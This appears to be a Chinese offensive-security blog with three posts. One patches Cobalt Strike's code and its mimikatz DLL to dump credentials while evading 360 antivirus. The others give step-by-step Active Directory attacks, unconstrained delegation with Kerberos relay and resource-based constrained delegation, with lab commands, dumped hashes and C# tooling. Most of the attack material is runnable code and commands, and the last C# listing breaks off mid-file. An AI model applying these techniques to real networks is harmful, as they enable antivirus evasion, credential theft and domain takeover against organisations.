Uknow - Stay hungry Stay foolish

cobaltstrike模块功能修改过360核晶

2021-12-29T16:17:17.000Z

众所周知，Cobalt Strike的一些功能模块都是用spawn的方法实现，其原理就是启动一个进程，然后对该进程进行功能模块dll反射注入，默认profile下是启动rundll32.exe这个进程，这种行为在数字的核晶模式下是会被拦截的。前两天刚好在吐司看到一篇文章有讲到，修改Cobalt Strike的源码将spawn的方式修改为inject的方法是可以bypass数字核晶的，因为将Cobalt Strike内置的功能模块dll注入到当前进程就没有新启进程的行为。本文结合上述文章并在@wonderkun师傅的帮助下得到了一个更好的修改方案。

功能模块分析

Cobalt Strike常见的功能如：logonpasswords，hashdump等功能在jar代码实现是beacon.TaskBeacon.class。

以logonpasswords为例，最终定位到如下代码处。

public void LogonPasswords()
 {
   MimikatzSmall("sekurlsa::logonpasswords");
 }

 public void MimikatzSmall(String paramString)
 {
   for (int i = 0; i < this.bids.length; i++)
   {
     BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
     if (localBeaconEntry.is64()) {
       new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
     } else {
       new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
     }
   }
 }

在MimikatzSmall方法中，根据目标系统版本进行spawn。跟进到MimikatzJobSmall方法，最后rdi的是mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dll。

public class MimikatzJobSmall
  extends MimikatzJob
{
  public MimikatzJobSmall(TaskBeacon paramTaskBeacon, String paramString)
  {
    super(paramTaskBeacon, paramString);
  }
  
  public String getDLLName()
  {
    if (this.arch.equals("x64")) {
      return "resources/mimikatz-min.x64.dll";
    }
    return "resources/mimikatz-min.x86.dll";
  }
}

修改Java

只需要将spawn方法修改inject方法即可，jar里实现的inject方法的需要传入pid，因为我们是注入当前进程，所以需要通过jar里实现的方法去获取当前进程的pid。另外需要注意的就是下面代码中的localBeaconEntry.arch()获取是当前进程的位数，而原来代码里的localBeaconEntry.is64()获取系统的位数。因为我们用到的是inject，所以需要在x64的进程中注入x64的dll，x86的dll中注入x86的dll。

public void MimikatzSmall(String paramString)
 {
   for (int i = 0; i < this.bids.length; i++)
   {
     BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
  int PID = CommonUtils.toNumber(localBeaconEntry.getPid(), 0); 
     if ("x64".equals(localBeaconEntry.arch())) {
  new MimikatzJobSmall(this, paramString).inject(PID, "x64");
         //new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
     } else {
  new MimikatzJobSmall(this, paramString).inject(PID, "x86");
  //new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
     }
   }
 }

DLL加解密

因为Cobalt Strike中的DLL是加密的，需要进行解密才能对其dll进行修改。相关操作这里就不再详细说了。

具体可以参考：https://github.com/lovechoudoufu/cobaltstrike4.4_cdf#dll%E4%BF%AE%E6%94%B9

修改相应的DLL

以logonpasswords为例，最后rdi的是mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dll。ida看一下这个dll，可以看到DLL的核心功能是在dllmain中完成的，调用功能函数之后，会直接调用ExitProcess 退出了进程。

这对于spawn方法是没有问题的，因为是新启动的rundll32.exe进程，执行完功能之后执行ExitProcess退出，但是被改成inject之后就有问题了，因为是在当前beacon进程空间中执行的，所以执行完功能会到导致当前的beacon进程挂掉。所以我们直接patch掉这个对ExitProcess的调用就可以了，但是看了一下对ExitProcess的调用是有多处的，一个一个patch太麻烦了。

所以这里有个更好的方法，就是直接把 ExitProcess修改为ExitThread方法。由于当前的dll是被inject方法调用起来的，是在当前进程空间新启动的线程，所以当前进程挂掉之后，beacon进程的主线程不会受到影响。这里利用 CFF Explorer 修改导入表就可以了。

然后再用ida打开，发现调用的就是ExitThread了。

测试

将dll和java修改完后，直接替换jar里的即可。简单测试一下是否过数字核晶。

我们直接执行mimikatz coffee命令，这里的mimikatz和logonpasswords调用的是不同的两个dll，其中logonpasswords是用inject方法，而mimikatz coffee未做修改，用的spawn方法。可以看到未修改的被拦截了，而修改过的成功执行回显。

BUG

如果我们上线的进程为x86的进程，而目标系统位数为x64位，此时我们执行logonpasswords，会对其x86进程注入x86的dll。此时会报错，报错内容为：

1	ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

这主要是内置的mimikatz的dll存在问题，msf中的mimikatz也会存在这个问题。因为目标系统为x64，所以需要一个x64的进程来注入x64的dll，即可。

参考文章

https://www.t00ls.cc/viewthread.php?tid=65597

非约束委派 + Kerberos中继

2021-11-29T16:17:17.000Z

0x00 前言

本文将从两个场景阐述【非约束委派 + Kerberos 中继】的组合使用。

两个场景中，攻击机均在域外（同内网）

0x01 实战场景一：拥有已设置非约束委派的主机的本地管理员账号密码

第一个场景：当我们拥有一个域内已设置非约束委派的 Windows 10 主机的本地管理员组的账号密码（假设是 adminsitrator），且因为该主机上存在一些杀软或其他设备导致无法远程登陆（3389、PsExec等远程登陆）到目标机器进行常规的非约束委派攻击。

本章节就以此为背景，讲述如何进行突破。下表是测试环境介绍：

主机	机器名	ip
域控	dc.test.local	192.168.247.8
域内win10（已控）	win10.test.local	192.168.247.10
Kali Linux（攻击机）	PWNED	192.168.247.145

####

1.1.Dump 远程机器LSA

首先我们需要 dump 目标机器上的机器账号的 AES256 密文和 NTLM 哈希值，为下一步做准备。

$ python3 secretsdump.py administrator:Password1@192.168.247.10
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xae45437a8b95c0eea4b4596158c2d68c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
TEST.LOCAL/aduser:$DCC2$10240#aduser#8addbc364aec2e91d4747bfb22334612
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
TEST\WIN10$:aes256-cts-hmac-sha1-96:01c5ab651c87d3e519d0e68236adc0cbc63b493519895efe2cd1939e212696db
TEST\WIN10$:aes128-cts-hmac-sha1-96:21177ecb02e30e940b7f61c0f990bd53
TEST\WIN10$:des-cbc-md5:9ecb207f9da8294a
TEST\WIN10$:plain_password_hex:a39afbc2b71fa35da2c18298d693049e64e0be3267a52e7078d02bed143f99ea8c12e58026e571bcf3696074a72b8d1f032ae1a7126ddfa7028cb859495c3939cae24a5cea26a13b293f65c696dd9a8e242d02d0fa087c73982613ec28d91e8e1936ec26cad5ed24f5f2cd9edac9b1da5996d096cbeb2fdc245d0d1c9fba19be4cc79c20806660a6efa9d66673cf5fd77ca23e52c5ddac27297086ea8acf2b6ca11c067c73290bfbf48e1a08577c0f2a84b12122fc0221d5fb42ed4ca00d9418a7418a122858ecfcac7b06430c8e853512bbbf1303b466aba0510e7946d4c1665a8453d9200249e299cb143e32fe2175
TEST\WIN10$:aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3a0621afad92277fc0d478f02a64049dcc3fc04d
dpapi_userkey:0x320de78175e986e0d25c6ac011c60dfa797ff571
[*] NL$KM 
 0000   10 30 50 6C 7C 06 4E C8  DB F8 41 5B 21 C9 53 54   .0Pl|.N...A[!.ST
 0010   1A 31 E8 0A 15 03 32 F1  8C 32 1E CB 36 6B 19 3A   .1....2..2..6k.:
 0020   C7 8A 68 BA 22 82 9B 01  2A 36 43 16 39 E3 CB 11   ..h."...*6C.9...
 0030   5B FB 13 DD 5F E4 9C 79  66 B6 B7 C1 18 89 9D 65   [..._..yf......e
NL$KM:1030506c7c064ec8dbf8415b21c953541a31e80a150332f18c321ecb366b193ac78a68ba22829b012a36431639e3cb115bfb13dd5fe49c7966b6b7c118899d65
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

如下图所示：

那么这里提个问题：为什么需要机器账号的 AES256 密文和 NTLM 哈希值呢？往下看，下面有解释。

1.2.域内机器的 System 权限

在域内机器中的 System 权限可以在域内充当机器账号。详细参考：

https://daiker.gitbook.io/windows-protocol/ldap-pian/10#1-ji-qi-yong-hu-gen-system-yong-hu-de-guan-xi

如下实验：我们在 Win10（192.168.247.10）主机中，使用本地管理员 administrator 账号执行 **setspn -q \*/\*** 命令，用于查询域内 SPN 记录，可以看到出现报错信息。但如果我们利用诸如 psexec 将当前权限提升至 system，再执行相同的命令，可以看到可以跟域控正常通信并获取 SPN 记录。这是因为在域内机器中，System 权限相当于域机器账号，可与域控正常通信（可用于域内信息收集）。

如下图，红框部分是 WIND10$ 机器账号注册的 SPN：

1.3.添加 SPN

我们尝试用一下项目中的 addspn.py 对该机器账户进行添加 SPN 操作。

https://github.com/dirkjanm/krbrelayx

上面已经对该机器账号进行了 SPN 查询，那么接下来尝试对该机器账号添加一条 SPN：HOST/PWNED.test.local，如果发现发现没有权限添加，那么该脚本会提示我们使用 –additional 参数对该机器账号的 msDS-AdditionalDnsHostName 属性进行修改。

这是为什么呢？这是因为在默认情况下，机器账号拥有可设置自身 msDS-AdditionalDnsHostName 属性的权限，并且可将该属性设置为任意主机名（包括不存在的主机）。所以本章节中，我们利用这个特性，为机器账号注册（添加）一个新的 SPN 记录： HOST/PWNED.test.local ，指向攻击机。

如下操作（机器账号的 NTLM 作用在此）：

# 查询当前机器账号的 SPN 记录
$ python3 addspn.py -u TEST\\WIN10$ -p aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0 -s HOST/PWNED.test.local -q dc.test.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=WIN10,CN=Computers,DC=test,DC=local - STATUS: Read - READ TIME: 2021-08-31T04:58:33.868515
    dNSHostName: WIN10.test.local
    sAMAccountName: WIN10$
    servicePrincipalName: RestrictedKrbHost/WIN10
                          HOST/WIN10
                          RestrictedKrbHost/WIN10.test.local
                          HOST/WIN10.test.local

# 尝试添加 SPN 记录，提示无权限，并建议使用 --additiona 对 msDS-AdditionalDnsHostName 进行修改
$ python3 addspn.py -u TEST\\WIN10$ -p aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0 -s HOST/PWNED.test.local dc.test.local  
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute

# 成功修改 msDS-AdditionalDnsHostName
$ python3 addspn.py -u TEST\\WIN10$ -p aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0 -s HOST/PWNED.test.local dc.test.local --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

在修改 msDS-AdditionalDnsHostName属性后，重新查询，可发现该机器账号下的 SPN 多了一条 HOST/PWNED.test.local 记录。这样我们注册spn的目的就达到了。

1.4.添加 DNS 指向

利用上述 krbrelayx 项目中的 dnstool.py 脚本，向 DNS 服务器添加一个 A 记录（域内用户默认拥有向 DNS 服务器添加 A 记录的权限）。将 PWNED.test.local 解析到 kali（192.168.247.145）攻击机。

1	$ python3 dnstool.py -u TEST\\WIN10$ -p aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0 -r PWNED.test.local -d 192.168.247.145 --action add dc.test.local

命令执行后，等待一会儿，使用如下命令进行查询，就可以看到已成功解析。

1.5.Kerberos 中继

在 Kali 攻击机上运行 krbrelayx.py 脚本，启动一个监听程序。

1	sudo python3 krbrelayx.py -aesKey 01c5ab651c87d3e519d0e68236adc0cbc63b493519895efe2cd1939e212696db

这里为什么是用的 aesKey 呢？这就不得不提这个 AES256 密文是怎么来的了（见答疑部分）。

1.6.触发打印机漏洞

最后利用打印机漏洞让域控对我们注册的恶意 SPN 服务主机 PWNED.test.local 进行身份认证。此时监听上就可以获取到域控的票据了。

1	python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:e8651b47207d6607cae4de554356ebb0 test.local/WIN10\$@dc.test.local PWNED.test.local

导入票据，导出 NTLM 哈希值。

0x02 实战场景二：拥有已设置非约束委派的服务账号的账号密码

2.1.为域用户配置 SPN

默认情况下，域账号不能设置委派，只有服务账号才能设置委派（非服务账号在用户属性中缺少【委派】选项卡）。

我们可以给一个域用户注册一个 SPN（此操作需要在域控上操作），将其变成服务账号，这样就可以对其进行委派设置。

1	setspn -A test/test testuser

2.2.添加 SPN

假设我们在域外拿到了一个已设置了非约束委派的服务账号密码，并且该账号可以给自己的账户注册 SPN（拥有读取和写入SPN的权限）。

1	python3 addspn.py -u test.local\\testuser -p Password1 -s host/PWNED.test.local ldap://dc.test.local

默认情况下，可能没有注册 SPN 的权限。需要手动在域控上给该服务账号设置权限（实战场景中，设置了非约束委派的服务账号是否存在该权限，情况不明）。

手动加上权限后，我们就可以给自己的服务账号下注册一个指向我们控制的机器的 SPN 了。

2.3.添加 DNS 指向

同样利用域账号在域外向域控 DNS 加入 A 记录。

1	python3 dnstool.py -u test.local\\testuser -p Password1 -r PWNED.test.local -d 192.168.247.145 --action add dc.test.local

2.4 Kerberos 中继 + 触发打印机

krbrelayx.py 启动监听，打印机漏洞触发 DC 到恶意注册的 SPN 服务主机 PWNED.test.local 进行身份认证。

1 2	sudo python3 krbrelayx.py --krbsalt TEST.testuser --krbpass Password1 python3 printerbug.py TEST.LOCAL/testuser:Password1@dc.test.local PWNED.test.local

得到票据，导入票据。进行进一步操作。

1 2	export KRB5CCNAME=/path/to/ticket.ccache python3 secretsdump.py -k dc.test.local -just-dc

0x03 相关技术细节

3.1 Kerberos加密方式

Kerberos 的加密方式可以在域控的「本地安全策略」中进行设置：

AD 支持的最弱加密方式是 RC4，他是没有用 salt 值进行加密。但是默认情况下 Kerberos 密钥使用的 AES-128 和 AES-256 进行加密，它是包含了 salt 值。

1. 对于用户账号，他的格式是大写的域名+区分大小写的用户名，例如：TEST.LOCALTestUser

1. 对于机器账号，他是大写的域名+host+完整的小写主机名，例如：TEST.LOCALhostwin10.test.local

同样在我们获取到了明文密码和 salt 时候，可以用加密得到 AES-256 密文。如服务账号场景下，我们用到的命令是

1	sudo python3 krbrelayx.py --krbsalt TEST.testuser --krbpass Password1

krbrelayx.py 会自动去计算 AES-256 密文。

3.2 非约束委派流程

当我们执行 printerbug.py 的时候，我们在攻击机 kali 上会接收到一个 AP_REP 的包，它是在一个 SMB 的包里被 GSS-API 和 SPNEGO 协议都用于封装的，可以看到他 Ticket 里的 SPN 为我们添加的恶意 SPN。

那为什么我们在 kali 上面只抓到一个 AP_REP 请求呢，AS 过程、TGS 过程和 AP_REQ 过程去哪里了呢？带着这个疑问往下走：

AP_REQ 过程，因为我们的 kali 无法正常的像域内机器一样响应这个 AP_REP，同时我们也没有启动 krbrelayx.py 来做一个监听处理。
AS 和 TGS 过程，是因为我们打印机漏洞是对域控的机器账户即 DC$ 触发他对我们添加的恶意 SPN 主机 PWNED 身份认证。AS 和 TGS 的过程是客户端跟 KDC（Key Distribution Center）进行通信的，这里的 KDC 就是域控。所以我们在攻击机上是抓不到 AS 和 TGS 过程的。

如下图，是一个完整的 kerberos认证过程（委派情况下）。

192.168.247.110 为域内一台普通主机，我使用域管登录。然后在上面执行 dir \192.168.247.10\c$ 命令，可以看到一个完整的kerberos认证过程，其中192.168.247.8为域控，192.168.247.10 被设置了非约束委派。

在第一个 AS_REP 中，我们可以看到加密 Kerberos 密钥用到的 salt。

在第一个 TGS_REQ 里，有我们请求的服务 cifs\win10.test.local。

第二个 TGS_REQ 里，请求的 krbtgt/test.local 的SPN，而且它有个 forwared 的标志，这个标志就代表这个 TGT 能用来进行委派。

在 Windows 下可以利用 klist 命令查看当前会话的票据信息，其中可以看到客户端，服务端，kerberos 票证的加密类型，票证的标志，有效期，其中被设置了委派的票据是含有 ok_as_delegate 的字样的。

前面的 AS 和 TGS 都是客户端（192.168.247.110）跟 KDC（192.168.247.8）进行通信的过程，最后的 AP 过程就是客户端（192.168.247.110）跟服务（192.168.247.10）进行通信的过程，其中 AP_REQ 是含有 TGS 获取获取到的 TGS 票据的，然后AP_REP 过程中，服务（192.168.247.10）会使用自己的 hash 解密 TGS 票据。判断客户端（192.168.247.110）是否有访问服务（192.168.247.10）的权限。有从而完整的完成了一次 Kerberos 协议的流程。

3.3 krbrelayx作用

在 AP_REQ 中，我们可以看到 Ticket 信息和 authenticator 信息。

ticket 是通过服务的密码进行加密，他包含了用户的认证信息和会话密钥(session key)。它也可以用来进行认证，因为他包含一个用户所属组的 PAC。
authenticator 是用会话密钥(session key）加密的结构。用来证明客户端拥有此密钥并用于对客户端进行身份验证

同时一个含有委派 TGT 的 AP_REQ 和不含有委派 TGT 的 AP_REQ，他的数据包大小是不一样的，含有的数据包会很大。如下图，上部分是委派情况下的，下面是正常情况下的。AP_REQ 数据包大小是不一样的，另外还会多出一个 TGS 的过程。

利用计算的好的 kerberos 密钥，即 AES256 密文是可以解密 AP_REQ 中的 Ticket 的，通过修改 krbrelayx.py 输出解密后的结构体：

其中包含 Ticket的有效期，Ticket 的用户名，还有授权信息（其中包含用户PAC）和会话密钥（session key）。

然后用 session key 可以来解密 authenticator。

解密后除了跟上面一样的信息，多出了一个 checksum，在这个字段里就包含了委派 TGT 的 KRB_CRED 结构体。

然后脚本会进行最后一步解密 enc-part 部分，这个部分包含与委托的 TGT 关联的会话密钥，我们需要在 DC 请求服务票证，解密后就会保存为ccache的格式。

这样我们就获取到了第二个 TGS_REQ 中看到的请求的 krbtgt/test.local 的SPN，且拥有 forwared 标志，可以用来委派的 TGT。

0x04 答疑

4.1.为什么要添加 SPN

服务主体名称（SPN: Service Principal Names）是服务实例，可以将其理解为一个服务（比如 HTTP、MSSQL）的唯一标识符，服务在加入域中时是自动注册的。使用 Kerberos 协议来认证服务，那么必须正确配置 SPN。

1
2
3

/: 
服务类型/对应机器名:服务端口[默认端口可不写]
MSSQLSvc/SQLServer.rcoil.me:1433

由上面的技术细节，我们也了解到了kerberos的认证过程是跟SPN紧密相关的，我们想让域控对我们的控制的主机通过SMB协议进行身份认证成功，就必须注册正确的SPN。确保通过打印机漏洞触发无约束委派对账户进行身份认证且我们可以正常的解密票证。

4.2.为什么要用 AES256 密文

由上面的技术细节，可以知道 AES256 是用来加解密 Kerberos 票证的，我们在知道主机的密码和 SALT 的情况下是可以正常的解密 Kerberos 票证，最后得到一个具有委派标志的 TGT。

基于资源的约束委派

2021-08-29T16:17:17.000Z

0x00 前言

基于资源的约束委派(RBCD)是在 Windows Server 2012 中新加入的功能，与传统的约束委派相比，它不再需要域管理员权限去设置相关属性。RBCD 把设置委派的权限赋予了机器自身，既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置 msDS-AllowedToActOnBehalfOfOtherIdentity 属性来设置 RBCD。

那么谁有权限配置 msDS-AllowedToActOnBehalfOfOtherIdentity 属性

将机器加入域的账号，也就是 mS-DS-CreatorSID 属性中的账户
机器账户自身也可以修改

利用基于资源的约束委派(RBCD)需要2个条件：

1.拥有将域机器加入域的域用户的权限。（将机器加入域的域用户拥有修改该机器的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的权限。）

2.一个任意服务账户或者一个机器账户（每一个域用户都可以添加 10 个机器账户，添加的机器账户默认会注册 spn 服务）

0x01 横向

1.1.环境说明

主机	机器名	ip
域控	dc.test.local	192.168.247.8
域内win10（已控）	win10.test.local	192.168.247.10
域内win2012（目标）	win2012.test.local	192.168.247.11

1.2.信息收集

通过 ADFind 查找将域机器拉入域的用户的 SID：

1	AdFind.exe -b "DC=test,DC=local" -f "(&(samAccountType=805306369))" cn mS-DS-CreatorSID

可以发现WIN10和WIN2012的mS-DS-CreatorSID值是相同的，说明他们是用的同一个域账号进行加域操作的。同时显示mS-DS-CreatorSID值为空说明他们是使用的域管账号进行加域操作的。

查看SID对应的域账号

1	AdFind.exe -b "DC=test,DC=local" -f "(&(objectsid=S-1-5-21-3289781467-4043238699-2345174683-2603))" objectclass cn dn

发现对应的域账号即当前我们获取的域账号权限。

同样上面的信息收集可以通过一个程序一步到位，代码来自：微软不认的“0day”之域内本地提权-烂番茄（Rotten Tomato）

.NET 实现在域内查询计算机”mS-DS-CreatorSID”属性的工具

using System;
using System.Security.Principal;
using System.DirectoryServices;
namespace ConsoleApp9
{
    class Program
    {
        static void Main(string[] args)
        {
            DirectoryEntry ldap_conn = new DirectoryEntry("LDAP://dc=test,dc=local");
            DirectorySearcher search = new DirectorySearcher(ldap_conn);
            String query = "(&(objectClass=computer))";//查找计算机
            search.Filter = query;
            foreach (SearchResult r in search.FindAll())
            {
                String mS_DS_CreatorSID="";
                String computername = "";
                try
                {
                    computername = r.Properties["dNSHostName"][0].ToString();

                    mS_DS_CreatorSID = (new SecurityIdentifier((byte[])r.Properties["mS-DS-CreatorSID"][0], 0)).ToString();
                    //Console.WriteLine("{0} {1}\n", computername, mS_DS_CreatorSID);
                }
                catch
                {
                    ;
                }
                //再通过sid找用户名
                String UserQuery = "(&(objectClass=user))";
                DirectorySearcher search2 = new DirectorySearcher(ldap_conn);
                search2.Filter = UserQuery;

                foreach (SearchResult u in search2.FindAll())
                {
                    String user_sid = (new SecurityIdentifier((byte[])u.Properties["objectSid"][0], 0)).ToString();


                    if (user_sid == mS_DS_CreatorSID) {
                        //Console.WriteLine("debug");
                        String username = u.Properties["name"][0].ToString();
                        Console.WriteLine("[*] [{0}] -> creator  [{1}]",computername, username);
                    }
                }

            }
        }
    }
}

这样就可以直接看到域内的主机是通过哪个域账号进行的加域操作。

1.3.创建机器用户

默认域控的 ms-DS-MachineAccountQuota 属性设置允许所有域用户向一个域添加最多 10 个计算机账户；

同时使用域账户创建或加入域的机器账户自动注册 SPN 变为服务账户。

所以我们创建了一个机器用户就相当于拥有了服务账户。

Powermad

可以使用Powermad

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\adduser\Desktop\Powermad-master\Powermad-master\Powermad.ps1;New-MachineAccount -MachineAccount evilpc -Password $(ConvertTo-SecureString "1qaz@WSX" -AsPlainText -Force)}"

可以看到成功添加了机器用户evilpc$。

1	setspn.exe -q /

同时注册了spn服务。

addcomputer.py

使用impacket套件中的addcomputer.py添加(无需在域内，只需要拥有一个域账号和网络通即可)。

1	python3 addcomputer.py -dc-ip 192.168.247.8 -computer-name evilpc2 -computer-pass 123456 "test.local/adduser:1qaz@WSX"

1.4.配置基于资源的约束委派

powerview.ps1(Empire)

查询添加机器的SID

1	powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer -Identity evilpc -Properties objectsid}"

配置基于资源的约束委派

修改SID为添加用户的SID，修改Get-DomainComputer后面跟目标主机名。

Import-Module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3289781467-4043238699-2345174683-2606)"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer WIN2012| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

在非交互的情况下可以将如下代码保存为 rbcd.ps1

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3289781467-4043238699-2345174683-2606)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Import-Module C:\Users\adduser\Desktop\powerview.ps1
Get-DomainComputer WIN2012 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

1	powershell -ExecutionPolicy bypass -File ./rbcd.ps1

检查是否配置成功

1	powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer WIN2012 -Properties msds-allowedtoactonbehalfofotheridentity}"

攻击完成清除基于资源的约束委派配置：

1	powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Set-DomainObject WIN2012 -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose}"

rbcd.py

https://github.com/tothi/rbcd-attack，依赖impacket，域外一步到位。

1	python3 rbcd.py -f EVILPC2 -t WIN2012 -dc-ip 192.168.247.8 test\\adduser:1qaz@WSX

1.5.获取票据

Rubeus(1.4.2)

Rubeus1.4.2需要依赖.net3.5。

1	Rubeus.exe hash /user:evilpc /password:1qaz@WSX /domain:test.local

我尝试从网上下载Rubeus.exe2.0发现s4u失败了，1.4.2版本没问题。

1	Rubeus.exe s4u /user:evilpc$ /rc4:161CFF084477FE596A5DB81874498A24 /impersonateuser:administrator /msdsspn:cifs/WIN2012 /ptt

再申请一个host服务的票据

1	Rubeus.exe s4u /user:evilpc$ /rc4:161CFF084477FE596A5DB81874498A24 /impersonateuser:administrator /msdsspn:cifs/WIN2012 /ptt

1	PsExec.exe \\WIN2012 cmd.exe

getST.py

在域外且有域账号的情况下。

python3 getST.py -dc-ip 192.168.247.8 -spn cifs/WIN2012.test.local -impersonate administrator test.local/evilpc2$:123456
export KRB5CCNAME=`pwd`/administrator.ccache
klist
python3 smbexec.py -no-pass -k WIN2012.test.local

0x02 提权

2.1.场景说明

在我们做社工钓鱼的时候经常会上线一些域账号，但是这些域用户没有在本地管理员组里面，我们是没有去抓密码啥的。所以就需要提权。

前提条件：上线的域账号为该机器加入域用到的域账号

2.2.利用RBCD进行提权

这里就利用RBCD进行提权，可以用以下代码实现 RBCD 创建机器账户和配置基于资源的约束委派的全过程。

代码来自：微软不认的“0day”之域内本地提权-烂番茄（Rotten Tomato）

using System;
using System.Text;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Net;
using System.DirectoryServices;
namespace Addnew_MachineAccount
{
    class Program
    {
        static void Main(string[] args)
        {
            String DomainController = "192.168.247.8";
            String Domain = "test.local";
            String new_MachineAccount = "testpc1"; //添加的机器账户
            String new_MachineAccount_password = "123456"; //机器账户密码
            String victimcomputer = "WIN10"; //需要进行提权的机器
            String victimcomputer_ldap_path = "LDAP://CN=WIN10,CN=Computers,DC=test,DC=local";
            String machine_account = new_MachineAccount;
            String sam_account = machine_account + "$";

            String distinguished_name = "";
            String[] DC_array = null;
            distinguished_name = "CN=" + machine_account + ",CN=Computers";
            DC_array = Domain.Split('.');
            foreach (String DC in DC_array)
            {
                distinguished_name += ",DC=" + DC;
            }
            Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            //Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
            //连接ldap
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
            System.DirectoryServices.Protocols.LdapConnection connection = null;
            //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account)
            });
            try
            {
                //添加机器账户
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account: " + machine_account + " Password: " + new_MachineAccount_password + " added");
            }
            catch (System.Exception ex)
            {
                Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }
            // 获取新计算机对象的SID
            var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
            var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
            SecurityIdentifier sid = null;
            foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
            {
                try
                {
                    sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                    Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
                }
                catch
                {
                    Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                    return;
                }
            }
            //设置资源约束委派
